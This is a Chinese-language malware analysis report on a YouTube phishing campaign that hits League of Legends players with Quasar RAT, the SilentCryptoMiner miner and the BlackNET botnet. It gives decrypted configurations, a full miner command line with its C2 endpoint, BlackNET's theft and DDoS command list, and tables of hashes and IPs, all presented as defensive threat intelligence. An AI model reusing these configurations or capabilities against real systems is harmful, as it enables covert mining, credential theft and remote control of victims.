文章首发地址:
https://xz.aliyun.com/t/15277
文章首发作者:
T0daySeeker
近期,笔者在日常工作中,无意间发现了某攻击团伙利用youtube视频网站针对LOL玩家进行木马钓鱼的攻击活动。通过分析,发现攻击者在youtube视频网站发布LOL辅助脚本介绍的视频,同时还在视频下方伪造了大量的评论信息及脚本下载地址,营造了一种视频很受欢迎的假象。进一步分析,发现攻击者将脚本下载网站页面进行了精心的构造,用以引导用户下载脚本并试用。当用户下载执行相关脚本文件后,即会被植入多种不同的远控木马程序。
通过对木马程序及恶意脚本下载网站进行对比分析,发现攻击者使用了多个开源远控木马框架。基于技术手段提取受控信息,发现全球有大几百个LOL玩家被钓鱼受控,同时「存在大量国内玩家受控的情况」。
受控情况如下:
钓鱼攻击
通过分析,发现攻击团伙于2023年8月19日注册youtube账号,然后在其youtube频道发布了两个视频:
-
2024年7月24日,视频标题《LOL Script 2024 – Updated 07/08/2024 FREE TRIAL》,视频对脚本使用效果进行了展示,脚本下载地址:namzsmurf.net -
2023年10月6日:视频标题《RoyalBlock.to: The Ultimate Block Battle Royale Experience!》,视频介绍了一款方块游戏,网站访问地址:royalblock.to,访问网站后发现,此网站并非方块游戏网站,而是LOL游戏的免费辅导网站,推测应该是攻击者对网站内容进行了更新
youtube频道截图如下:
钓鱼视频一
攻击者在youtube视频下方备注了脚本下载地址,对应youtube频道视频截图如下:
恶意脚本下载网站截图如下:
钓鱼视频二
攻击者在youtube视频下方备注了方块游戏的访问地址,对应youtube频道视频截图如下:
实际访问网站后发现,此网站并非方块游戏网站,而是LOL游戏的免费辅导网站,推测应该是攻击者对网站内容进行了更新,相关网站截图如下:
关联分析
通过关联分析,发现svchost.exe(72982e83206930e2da3f4887ef09520fbf6937f9475f34620c6a78843c640a65)样本的外链地址即为91.92.242.16。相关截图如下:
通过关联分析,发现vps-276e8ec4.vps.ovh.net域名的解析IP与royalblock.to域名的解析IP相同,相关网站截图如下:
NamzScript.exe
通过分析,发现此文件是一个SFX自解压文件,样本运行后,将自解压文件至%appdata%目录,解压完成后将执行start.vbs脚本文件,相关截图如下:
start.vbs
通过分析,发现start.vbs脚本运行后,将使用解压密码“1337guy$$$”自解压Client-built2.sfx.exe文件,相关截图如下:
Client-built.exe
通过分析,发现此样本是一款Quasar RAT远控木马。
进一步分析,发现此样本的Quasar RAT远程木马版本为1.4.1,并且此样本的反编译代码与github上下载的开源Quasar RAT远控木马的反编译代码完全相同,因此,推测此样本应该是攻击者直接从https://github.com/quasar/Quasar地址下载的最新版本所得。
「备注:关于Quasar RAT开源远控木马的详细分析资料,大家可查看笔者的历史分析文章《QuasarRAT与AsyncRAT同源对比及分析》,文章地址:https://xz.aliyun.com/t/13596」
解密算法
通过分析,发现此样本的解密算法与github上下载的开源Quasar RAT远控的解密算法完全相同。相关代码截图如下:
解密配置信息
基于《QuasarRAT与AsyncRAT同源对比及分析》文章中提到的自动化配置信息解密脚本,可有效解密此木马程序的配置信息,解密后的配置信息如下:
Version:"1.4.1"
Hosts:"namz.read-books.org:1337;"
Install Subdirectory:"SubDir"
Install Name:"WindowsUpdate.exe"
Mutex:"06f1c124-2f86-4205-a4b8-825abb0ee5d0"
Startup Name:"DqdCQdqc"
Client Tag:"TrumpUS"
Log Dirctory Name:"Logs"
Serversignature:"WSX/zrjZPMvloBCYoCZwXk5oUXlv1h1OILhSvV6iFexcuLJELOHJ+Sgm48BVlwoWT/FCXvsrDmMFnrGJp7gcSLIphO1Syoe7L1hu9ZjPyKgDAD4jlZU8QLnev29dBqFhhyG4RAieAl0WymMO72yC0VDCOVjt10AXt83tfRYQCDhYVwiu8GIi/Dr/ZA4549GgIQYHA4ma38q21Dj5/rf5KDdvf8sWZ2gApHA7MKS4GekYMp1sGPO4iJHx7PCKbx3aB9vU2zYrPdQoGHk+flSUm+quSEjehuBD3fPGWn3TasShmi7xf1CVB2e3M0bqArwTkVvdewftdJTRP81BqUUn+qudQTNh0+2HnjUgXrXkHrNAaZHFOw9CgoDkB3uao8c/p72giDKQn1lU31uiws3qrN5Sq0Xx2eb/B3GQOJwz+NbM7NqBZK230Rp3CjItFqnb+jOdWUuiZ7ejb43bGo6UzOFwwvFkQGgfCr3H4r8+IH/4OQ4EPiH1bg+bggj9DM3nAxPBIxzELOr+S+g43EovvOGw2GHeckA5El5Cljhg1yfrshYZSHYpieo8+5KYXlint7oe0HP1TG30H03IxDOufvEh0jPeW/rLEZhtxYmIn9LtuwahiZ/+3jjbAjoWFN17Abdzdp6e21gEfJI0cqwW6sSxzL6a8mfWqxSSZXjCyyA="
Certificate:"MIIE9DCCAtygAwIBAgIQAJOHSHzhHMAszggZP4r4rTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDgwMTEwMDAwOVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAm8D36T/WXpCEOOAO1iOpQiVnvsMi28QfDHydIn+YCkT38KhNMToB/26qX1uI0ug4hR/DVOWg6QWV8BdAR01jeDesu32Jle9yF+MbIpDhMCJur/4XJmRiOY9+V5PUDhZwq51zzxItpZJD0zXh9KV1Pls+EuMvv3XFtXX21cUQAe5fDIVN4HxK1pADRwZ0S5YSJEGuZnC3VbStQBOJ+2VijcxPbWSSnTfFAK9mqfS7PtuIHD9mH9ahkJwbN9unand0N6/bYQnzY/pwbMAJApJ9GOBrB/3GTmDqzo+h3aFfXJykv2ZpJN1nb2vxPg3L1I8jMUpT20B0rOMEMzjxqEL8vSBexFO3NEoxpyQNTzolUFqsajHLCjozniro+KzDpoiwks+TLoC1Mz41RrWWBNz3c23uFs/giIKhohhn8T07d9gYbzo2IMw5Y/0diLmrEAEps39v3crFGm12u4Apx5KoCtHm53CziVVgs8Da4KwXeJt87oShuHN5Yj8g3o5AEzrEb/QUMvGBkfFDe6FuJ/Xm+ZN+2VTNJJrtlhi3iEV6IL4RdzT1x6kJ1xqRME1Ntz5rGyLW76UjIr6Baxb+zuoBnN2yOH3eSx2X8BVVslGmT874XrPXrcGzcCKUtZqCEkYODX4LylPBXzQ73RplVwbX9oFEvoc24LKh5kSui88Xqb0CAwEAAaMyMDAwHQYDVR0OBBYEFDz0A4HbGVoI4GBkjzEtWx8p3w3GMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAIXXWHYCe1DXFBW8Zg0vh0h4nn5aRnYqX63U/cJ1u44VSu+e491o5c/If4JyXUWgywPR4Eo/cmEjJk+eym4eDzzR6WDjTuxd12pKhp/F1+2WOTTag66ILyXWPoIjPW77iSnTck9sAgiQKjDFgdjOvPwA/+k9DNurxSw/Rs/5cGs0QR8wrw6HnieEvVAqHYIZfuaoCevEW4MNmbVa7ifY/d+Fb2o+hBcd6oQhC6J+yQkA52RMBFGWjUeLHbzFFaCjrBImgjnXcu/6qNdEL1MNoFo3jOVpTYK4ZIn+Puwn65B4O9Ln49ffYO4yhqvDF3ynUOhZSRDDkh9SlMzNywOBokOkY9+ufZMrIQwDZFH98PFAERTyzZt3OjN+U8OPxoIEawt+pkJo8q5g3eMwEG4uJYduaio4Eamn3jjoMnB0WCIuJn2E2pFK/GU0rvP0wprP1zu8PMbGIube2RZ4eP6yUKBfOkiLO/A3MIro6yqTppeBlvZrujV3xNb69/fIpmoLIQJyVhcTQjgcAtUfFa9HalmsfTpcCraHtabrH4g6OuwMKCqaHYtoYzYWOzwZAikvGY+1OOLT7TYYthXCAVd17kRqNXPyQZq/4Y4G1POUoXKlRCVoKq7d+tr7s6VoV9lh+iB1aVG8Bg3oAg+NEp9DgO8wYi3pmpCnPHJFW74K4vDb"
Update.exe
通过分析,发现此样本是SilentCryptoMiner挖矿木马,开源项目地址为https://github.com/UnamSanctam/SilentCryptoMiner(备注:目前此开源项目已被Github禁用)
自启动
通过分析,发现此样本运行后,将复制自身至C:ProgramDatabjvvxgbjmpijnpldfzxzkixc.exe路径,然后创建LDQRSTKE服务,用以实现木马程序自启动。相关截图如下:
释放文件
进一步分析,发现此样本运行后,将在C:WindowsTemp目录下释放edcchowqigmf.sys文件,进一步分析,发现此驱动文件即为xmrig挖矿软件中的WinRing0x64.sys驱动文件,相关对比截图如下:
进程注入
通过分析,发现样本运行后,还将启动dialer进程,然后将恶意代码注入到该进程当中,注入的恶意代码使用的是UPX加壳。相关截图如下:
配置信息
通过分析,提取此样本的配置信息:
-
注入进程:dialer.exe -
矿池地址:zeph.2miners.com:2222 -
钱包地址:ZEPHYR2CLWQJrcoTC34ZFxUhj3zHM6SXRL9rCJUoFpLsJgn2FQBiG5uYJD64vAodJNYiaGFjUpUEFUEZLYPjxgDm3AoF7ig3UiC1D -
stealth-targets:Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe -
上线地址: http://51.77.140.74/api/endpoint.php
完整配置信息如下:
dialer.exe --algo=rx/0 --url=zeph.2miners.com:2222 --user=ZEPHYR2CLWQJrcoTC34ZFxUhj3zHM6SXRL9rCJUoFpLsJgn2FQBiG5uYJD64vAodJNYiaGFjUpUEFUEZLYPjxgDm3AoF7ig3UiC1D.RIG --pass=x --cpu-max-threads-hint=20 --cinit-winring=edcchowqigmf.sys --randomx-no-rdmsr --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe --cinit-stealth-fullscreen --cinit-api=http://51.77.140.74/api/endpoint.php --cinit-version=3.4.1 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-id=jrnfypllqlwghdvf
进一步分析,发现此样本具备Rootkit功能,可针对stealth-targets配置信息中的目标进程,隐藏其注入进程。相关截图如下:
钱包地址追踪
尝试对此挖矿程序的钱包地址进行追踪,相关截图如下:
svchost.exe
通过分析,发现此样本是一款BlackNET僵尸网络木马,开源项目地址为https://github.com/FarisCode511/BlackNET(备注:目前此开源项目已不再维护,且已被删除)
配置信息
通过分析,提取此样本的配置信息如下,通过对此配置信息进行剖析,发现此样本具备反沙箱、USB传播、Dropbox云盘和OneDrive云盘传播等功能:
Host = "http://91.92.242.16/Panel/"
ID = "Ydt6Vl"
Startup = "True"
HardInstall = "True"
StartName = "e162b1333458a713bc6916cc8ac4110c"
BypassScanning = "True"
USBSpread = "True"
DBSpread = "True"
ODSpread = "True"
AntiVM = "True"
ElevateUAC = "True"
AESKey = ""
AESStatus = "False"
InstallName = "WindowsUpdate.exe"
PathS = "Temp "
ASchtask = "False"
DebugMode = "False"
KeyloggerOnRun = "False"
WatcherStatus = "True"
BinderStatus = "False"
DropperPath = ""
DownloaderStatus = "False"
DownloaderPath = ""
DelayCodeStatus = "True"
DelayCodeTime = "4428"
BypassWD = "True"
EnableCP = "True"
Ver = "v3.7.0 Public"
st = 0
Y = "|BN|"
MTX = "BN[]"
相关代码截图如下:
反虚拟机
通过分析,发现此样本运行后,将通过判断虚拟机文件的方式来检查虚拟机环境,若运行至虚拟机环境,则将直接退出,相关代码截图如下:
传播功能
通过分析,发现此样本支持USB和Dropbox云盘、OneDrive云盘传播,相关代码截图如下:
远控指令
通过分析,梳理此样本的远控指令如下:
| 主指令 | 子指令 |
|---|---|
| Ping | |
| StartDDOS | UDPAttack、SlowlorisAttack、ARMEAttack、TCPAttack、HTTPGetAttack、BWFloodAttack、PostHTTPAttack |
| StopDDOS | UDPAttack、SlowlorisAttack、ARMEAttack、TCPAttack、HTTPGetAttack、BWFloodAttack、PostHTTPAttack |
| UploadFile | |
| OpenPage | |
| OpenHidden | |
| Uninstall | |
| ExecuteScript | bat、vbs、ps1 |
| StealDiscord | |
| Close | |
| ShowMessageBox | None、Information、Asterisk、Critical、Warning、Question、OkOnly、OkCancel、YesNo、YesNoCancel、AbortRetryIgnore、RetryCancel |
| MoveClient | |
| Blacklist | |
| Screenshot | |
| XMRMiner | |
| TorrentSeeder | |
| StealCookie | |
| StealChCookies | |
| InstalledSoftwares | |
| GetClipboard | |
| GetFile | |
| StealBitcoin | |
| StartKeylogger | |
| StopKeylogger | |
| RetriveLogs | |
| StealPassword | |
| InvokeCustom | |
| SpamEmail | |
| RemoteShell | |
| CleanTemp | |
| UpdateClient | |
| Restart | |
| Elevate | |
| Logoff | |
| Restart | |
| Shutdown |
相关代码截图如下:
网站分析
结合样本功能及网站情况,对网站进行简单分析,发现上述两个钓鱼网站均存在后台登录页面,结合网站特征,发现:
-
namzsmurf.net网站部署了BlackNET僵尸网络控制后台; -
royalblock.to网站部署了SilentCryptoMiner挖矿木马控制后台;
相关截图如下:
相关码址
-
域名、IP、URL信息如下:
| 域名、IP、URL | 归属地 | 备注 |
|---|---|---|
| namzsmurf.net(91.92.242.16) | 荷兰 | |
| royalblock.to(51.77.140.74) | 法国 上法兰西大区 鲁贝 | |
| vps-276e8ec4.vps.ovh.net(51.77.140.74) | 法国 上法兰西大区 鲁贝 | |
| namz.read-books.org:1337(87.89.82.13) | 法国 大东部大区 斯特拉斯堡 | Client-built.exe外链地址 |
| zeph.2miners.com:2222 | Update.exe矿池地址 | |
http://51.77.140.74/api/endpoint.php |
法国 上法兰西大区 鲁贝 | Update.exe上线地址 |
http://91.92.242.16/Panel/ |
荷兰 | svchost.exe外链地址 |
-
Hashs信息如下:
| 文件名 | Hash | 备注 |
|---|---|---|
| NamzScript.exe | be87988d10070a2a95aa02f5cdab0aab | 自解压文件 |
| start.vbs | 9c9c5ace80e216ae113c55a317414edd | |
| Client-built2.sfx.exe | 34ce1530d7c6221627ba23c7aca03435 | 自解压文件 |
| Client-built.exe | be87988d10070a2a95aa02f5cdab0aab | Quasar RAT |
| Update.exe | 42FA3ED3A69E46DD9E736B6779FCB461 | SilentCryptoMiner挖矿木马 |
| edcchowqigmf.sys | 0C0195C48B6B8582FA6F6373032118DA | WinRing0x64.sys |
| svchost.exe | 67289188208C899195083547187789C9 | BlackNET僵尸网络木马 |
原文始发于微信公众号(T0daySeeker):针对LOL玩家的最新钓鱼活动剖析-大量国内玩家受控
